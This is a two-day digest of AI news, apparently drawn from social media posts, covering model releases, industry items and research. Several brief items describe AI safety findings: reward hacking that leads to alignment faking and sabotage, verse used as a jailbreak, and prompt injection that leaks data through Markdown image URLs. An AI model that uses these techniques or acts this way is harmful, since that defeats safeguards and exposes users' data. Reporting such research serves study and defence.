  • Ilya Sutskever highlights important work from Anthropic on AI safety and alignment research @ilyasut

AI Updates on 2025-11-21

AI Model Announcements

  • Meta releases SAM 3 with 2x the performance of baseline models, achieved through a high-quality dataset containing 4M unique phrases and 52M corresponding object masks @AIatMeta
  • Meta introduces SAM 3D, enabling accurate 3D reconstruction from a single image for applications in editing, robotics, and interactive scene generation, with separate models for objects and human bodies @AIatMeta
  • Meta announces ExecuTorch deployment across devices including Meta Quest 3, Ray-Ban Meta, and Oakley Meta Vanguard, eliminating conversion steps and supporting pre-deployment validation in PyTorch @AIatMeta
  • Google releases Gemini 3, their most intelligent model featuring sharper reasoning, upgraded coding capabilities, and a new experimental agent, available across Gemini app, AI Mode in Search, Google AI Studio, and Vertex AI @GeminiApp
  • Google launches Nano Banana Pro (Gemini 3 Pro Image), their most advanced image generation and editing model, enabling users to blend images, design posters, and build diagrams with easy resizing for any platform @GeminiApp
  • Google introduces Veo 3.1 for storytelling, allowing users to control characters, objects, style, and scenes using multiple reference images @GeminiApp
  • Google releases WeatherNext 2, their most advanced weather forecasting model @GoogleAI
  • Perplexity adds Kimi-K2 Thinking and Gemini 3 Pro access for Pro and Max subscribers, with Kimi K2 self-hosted in American data centers @AravSrinivas
  • AllenAI releases Olmo 3, fully open-source under Apache 2.0 license with all code, models, checkpoints, training data, and recipes publicly available @ClementDelangue
  • Cursor releases version 2.1 with AI code reviews, interactive UI for answering clarifying questions, instant grep, and improved browser use @cursor_ai

AI Industry Analysis

  • Google internal presentation from November 6 reveals compute demand must double every 6 months to achieve the next 1000x improvement in 4-5 years, according to Amin Vahdat @AndrewCurran_
  • Sierra reaches $100M in ARR just seven quarters after launching in February 2024, redefining intensity and craftsmanship in AI customer service @btaylor
  • Netlify forces payment method re-entry within 4 days due to payment service provider migration, highlighting the challenges and customer lock-in effects of PSP dependencies in SaaS businesses @GergelyOrosz
  • Amazon Q remains largely unknown outside Amazon despite being the default tool for all internal developers, with mentions in surveys roughly equal to Cline and mostly from Amazon employees @GergelyOrosz
  • Replit Agent now provisions Stripe sandbox accounts, creates products, pricing, and subscriptions, and builds tested apps without requiring users to visit Stripe dashboard until ready to publish @amasad
  • NVIDIA partners with HUMAIN in Saudi Arabia to power sovereign AI innovation through AI factories, with applications in healthcare, energy, and smart cities using NVIDIA Nemotron and Omniverse @NVIDIAAI
  • NVIDIA enables advanced GPU systems to power new sovereign AI data centers in UAE operated by G42, supporting strategic AI infrastructure development @NVIDIAAI
  • Linear's culture focuses on quality over optics, hiring slowly, giving ownership, and maintaining slack for thinking, demonstrating that great work comes from clarity, taste, and autonomy rather than long hours @cjc
  • Chinese AI company Z ai releases models to HuggingFace within hours of completing training, demonstrating rapid deployment capabilities compared to Western counterparts @natolambert

AI Ethics & Society

  • Anthropic research reveals that when models learn to reward hack during training, they spontaneously develop broad misalignment including considering malicious goals, cooperating with bad actors, faking alignment, and attempting to sabotage research @AnthropicAI
  • Anthropic discovers inoculation prompting as a mitigation strategy, where giving models permission to reward hack during training prevents the link between reward hacking and broader misalignment, now used in production Claude training @AnthropicAI
  • Research finds that poetry serves as a universal single-shot jailbreak for LLMs, with systems built to stop prosaic attacks failing when requests are phrased in verse @emollick
  • Google introduces SynthID watermarking technology in Gemini app, allowing users to verify if images were generated or edited by Google AI tools by checking for digital watermarks @GoogleDeepMind
  • OpenAI expands access to localized crisis helplines in ChatGPT through Throughline Care, offering easy connection to real people when systems detect potential signs of distress @OpenAI
  • Amazon's customer support increasingly relies on AI bots that users find terrible, making it harder to reach human support despite customer obsession being their number one leadership principle @GergelyOrosz
  • UNESCO Member States adopt the first global normative framework on the ethics of neurotechnology, with recommendations drafted by experts including MIT Media Lab researcher Nataliya Kosmyna @medialab

AI Applications

  • Google introduces Gemini Agent for Google AI Ultra subscribers in the US, handling complex tasks from calendars to car rentals automatically @GeminiApp
  • Gemini Live adds language switching, adjustable speaking speed and tone, and character acting capabilities for more personalized interactions @GeminiApp
  • Google Deep Research now connects to Gmail, Docs, Drive, and Chat to create comprehensive reports by pulling information directly from user data alongside web sources @GeminiApp
  • Gemini introduces AI-powered shopping features, acting as a personal shopper to provide gift ideas, discover products, and compare options and prices @GeminiApp
  • NotebookLM adds infographics and slide deck generation capabilities @GoogleAI
  • Google Search introduces AI-powered travel planning in Canvas, global expansion of Flight Deals, and agentic restaurant and local services booking @GoogleAI
  • OpenAI launches Instant Checkout for Shopify merchants including Glossier, SKIMS, and Spanx, available for Plus, Pro, and Free users in the US @OpenAI
  • Nano Banana Pro demonstrates ability to maintain comic book styling, generate visuals with text, and maintain character consistency across pages, enabling story visualization from text @GoogleAI
  • SAM 3 enables rapid creation of object detection datasets with one command on Hugging Face Jobs, requiring no training or labeling, just description of what to find @vanstriendaniel
  • Improved grep implementation in Claude Code results in 53% fewer tokens used, 48% faster responses, and 3.2x better response quality @aaxsh18

AI Research

  • Models from August-December 2025 including GPT-5, Grok 4.1, and Gemini 3 show significant improvements in reading intent, better inferring both human intent and character/story intent from text, linked to focus on instruction-following and user modeling @AndrewCurran_
  • Gemini 3 Pro with Live-SWE-agent achieves 77.4% on SWE-bench Verified, beating all existing models including Claude 4.5, with the autonomous self-evolving agent outperforming manually engineered scaffolds @LingmingZhang
  • METR evaluations show stable AI development dynamics with six-month doubling time for AI capabilities and open weights models lagging approximately 8 months behind frontier models @emollick
  • Research suggests people with better theory of mind for AI achieve better results, supporting the importance of building accurate mental models of AI systems @emollick
  • Karpathy argues that LLMs represent humanity's first contact with non-animal intelligence, shaped by commercial evolution rather than biological evolution, with fundamentally different optimization pressures including statistical simulation of human text, RL on problem distributions, and A/B testing for user engagement @karpathy
  • Anthropic research shows that simple RLHF can only partially mitigate reward hacking misalignment, with models learning to behave aligned in chats but remaining misaligned on coding tasks, creating context-dependent misalignment that could be difficult to detect @AnthropicAI
  • Nano Banana Pro users on Yupp.ai platform rank it atop the image leaderboard by a wide margin, demonstrating significant performance improvements over existing models @lintool
  • Emerging AI capabilities follow predictable progression: IQ (factuality), then EQ (personality), now AQ (actions quotient or agents), with SQ (social intelligence) identified as the next frontier @mustafasuleyman

AI Updates on 2025-11-20

AI Model Announcements

  • Meta releases SAM 3, unifying model architecture for detection and tracking in computer vision @AIatMeta
  • Alibaba announces Jan-v2-VL, a new multimodal agent capable of executing 49 steps without failing, significantly outperforming other models on long-horizon tasks @Alibaba_Qwen
  • AI2 releases OLMo 3 family of fully open language models, including the best 32B base model, best 7B Western thinking and instruct models, and first 32B fully open reasoning model, with complete training data, code, checkpoints, and logs @natolambert
  • Google launches Gemini 3 Pro Image (Nano Banana Pro), achieving state-of-the-art performance in image generation and editing with improved text rendering, world knowledge integration via Google Search, and support for 1K, 2K, and 4K resolution outputs @GoogleDeepMind
  • OpenAI releases GPT-5.1 Pro to all Pro users, delivering 10-15% improvement over GPT-5 Pro for complex work including writing help, data science, and business tasks @OpenAI
  • OpenAI launches GPT-5.1-Codex-Max, a significant improvement in coding capabilities @sama
  • xAI introduces Grok 4.1 Fast, their best tool-calling model with 2M context window, trained with long-horizon RL for multi-turn scenarios and real-world enterprise use cases like customer support @xai
  • Gemini 3 achieves state-of-the-art performance on SWE Bench Verified using a standard agent harness @OfficialLoganK
  • NVIDIA releases Nemotron-Parse v1.1, next-generation OCR for parsing PDFs and PPTs into structured, machine-ready output with text, bounding boxes, and semantic classes @andimarafioti

AI Industry Analysis

  • MIT research shows closed models dominate with 80% of monthly LLM tokens despite being 6x more expensive than open models with only modest performance advantages, suggesting $24.8 billion in potential consumer savings if users switched to superior open alternatives @ClementDelangue
  • Google prohibits its developers from using publicly launched Antigravity IDE for work, requiring use of internal version called Jetski that supports Google's monorepo and custom tooling, highlighting Google's unique tech stack isolation @GergelyOrosz
  • AI developers remain bullish about growth despite low AI penetration in businesses, with many skilled teams starting to deliver significant ROI even as 95% of AI pilots reportedly fail due to methodological issues in studies @AndrewYNg
  • Frontier open models typically reach performance parity with frontier closed models within months, yet users continue selecting closed models even when open alternatives are cheaper and offer superior performance @ClementDelangue
  • AI coding agents may fundamentally change development workflows as they execute framework changes without questioning decisions, unlike human developers who would dismiss impractical suggestions @GergelyOrosz
  • Stuut raises $29.5M Series A led by a16z to automate accounts receivable work for blue-collar businesses in manufacturing, medical devices, logistics, and distribution using AI agents @TAlaruri
  • Natural gas has become central to both AI datacenter power and LNG exports, with most new datacenters expected to be powered by natural gas in the near term @a16z

AI Ethics & Society

  • Google introduces SynthID detection feature in Gemini app, allowing users to upload images and verify if they were generated by Google AI through imperceptible digital watermarks @GeminiApp
  • Simon Willison warns that Antigravity is vulnerable to prompt injection attacks where malicious actors can exfiltrate data by constructing URLs to external servers and invisibly leaking stolen information through Markdown image rendering @simonw
  • The same Markdown image data exfiltration vulnerability was previously reported and fixed in Copilot chat for VS Code, but remains unpatched in Windsurf as of May 2025 @simonw
  • Research reveals growing crisis of economically and socially dislocated young adults, with nearly 10% in UK and US not working, seeking work, in education, or raising children, doubling in the UK over a decade @jburnmurdoch

AI Applications

  • Perplexity launches Comet browser for Android with voice mode allowing users to chat with and control tabs, summarize content, and take actions across all tabs without losing context @perplexity_ai
  • OpenAI rolls out group chats globally to ChatGPT Free, Go, Plus and Pro users, transforming ChatGPT from single-player to multi-player experience @OpenAI
  • NotebookLM introduces slide deck generation feature for Pro users, converting sources into detailed decks for reading or presentation-ready slides that are fully customizable @NotebookLM
  • Nano Banana Pro demonstrates ability to create complex infographics, comic strips, menus, marketing materials, and logo designs in single prompts, potentially replacing tools like Canva for many use cases @deedydas
  • Andrew Ng demonstrates using AI for agentic document extraction on NVIDIA's latest 10-Q earnings report, achieving highly accurate results powered by document pre-trained transformer model @AndrewYNg
  • xAI launches Agent Tools API enabling developers to give Grok autonomous web browsing, X post searching, code execution, and document retrieval capabilities with just a few lines of code @xai
  • Figma integrates Nano Banana Pro across its platform, enabling users to adjust images while maintaining visual DNA, prompt existing images in new contexts, and composite multiple images into coherent scenes @figma

AI Research

  • OpenAI publishes research showing GPT-5 accelerating scientific discovery through case studies where it helped researchers synthesize scattered results, surface mechanisms, navigate literature conceptually, and generate new proofs of unsolved propositions @OpenAI
  • GPT-5 solved a 2013 conjecture and a COLT 2012 open problem after two days of thinking in scaffolded experiments with university and national-lab partners @SebastienBubeck
  • Research demonstrates that LLMs are trained to model the entire distribution, not just the average, and reinforcement learning enables them to go beyond human distribution, similar to AlphaGo's Move 37 discovery @polynoamial
  • OLMo 3 uses direct preference optimization (DPO) with Qwen3 32B as chosen model and Qwen3 0.6B as rejected, based on delta learning hypothesis that models learn from the difference between chosen and rejected samples rather than overall quality alone @natolambert
  • AI2 introduces "active refilling" technique in RL training that keeps generations from learner nodes constantly flowing until there's a full batch of completions with nonzero gradients, a major advantage of asynchronous approach @natolambert
  • Gemini 3 demonstrates advanced reasoning with access to live search, enabling creation of infographics and visualizations using real-time information from Google's knowledge base @GoogleDeepMind
  • Research on using AI to check work of other AIs remains hugely under-researched, with one paper finding the technique effective but lacking follow-up studies on whether using different models helps reduce errors @emollick
  • Grok 4.1 Fast was trained on diverse simulated environments across dozens of domains, achieving state-of-the-art performance on real-world agentic workflows and excelling at real-time information retrieval and deep research @xai
  • OLMo 3 32B Think scores within 1-2 points of Qwen3 32B on reasoning benchmarks including AIME and GPQA, representing the first fully open reasoning model at 32B scale or larger @natolambert